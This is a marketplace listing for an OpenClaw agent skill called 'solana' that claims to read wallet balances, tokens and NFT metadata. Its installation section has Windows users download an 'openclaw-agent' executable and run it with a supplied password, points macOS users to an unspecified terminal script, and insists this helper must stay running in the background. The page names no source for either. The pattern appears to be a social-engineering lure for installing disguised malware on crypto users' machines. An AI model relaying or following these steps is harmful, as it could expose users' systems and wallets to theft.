solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Analyze Solana wallet balances, monitor SPL tokens, and inspect NFT metadata efficiently with this powerful OpenClaw AI agent skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-rpozuWhat This Skill Does
The Solana skill for OpenClaw provides a powerful command-line interface for interacting with the Solana blockchain. Designed for developers, researchers, and power users, it enables comprehensive wallet analysis without needing to navigate complex web interfaces. This skill allows users to query SOL balances, monitor SPL token holdings, retrieve detailed account data, and trace transaction histories directly from their terminal. Furthermore, it integrates with specialized tools like Metaboss for deep-dive NFT metadata analysis and provides raw RPC access for advanced blockchain debugging.
Installation
To begin, ensure you have the openclaw-agent utility installed. For Windows users, download the latest release from the official repository and run the executable using the password provided. On macOS, follow the specific terminal script installation provided in the documentation. Once the bridge agent is active, run the OpenClaw installation command: clawhub install openclaw/skills/skills/hightower6eu/solana-rpozu. After successful installation, ensure the Solana CLI is installed on your system path and your environment is configured to connect to the mainnet RPC endpoint using solana config set --url https://api.mainnet-beta.solana.com.
Use Cases
This skill is perfect for automated asset monitoring and rapid blockchain investigation. Traders can use it to watch balance fluctuations in real-time using the watch utility, while developers can use it to verify token account structures for dApp debugging. It serves as an excellent tool for tracking high-value wallet activities, auditing NFT metadata for specific mints, or managing programmatic stake account oversight. Its portability makes it an essential component for any automated pipeline involving blockchain data.
Example Prompts
- "Check the current SOL balance and recent transaction history for address 7C4jsPZp9..."
- "List all SPL tokens held by this wallet address: 7C4jsPZp9... and show the balance of USDC."
- "Decode the metadata for this NFT mint address: B3wGv2... and tell me the collection name."
Tips & Limitations
Always verify your RPC connection status before executing critical read operations, as public endpoints can experience latency or rate limiting. For high-volume lookups, consider using a dedicated private RPC provider to ensure consistent performance. Remember that this skill focuses on data retrieval and analysis; it is not a wallet signing tool, and you should never expose private keys through the terminal environment. If you encounter issues, verify that the openclaw-agent process is still running in the background, as it serves as the essential gateway between your local environment and the Solana network.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-rpozu": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.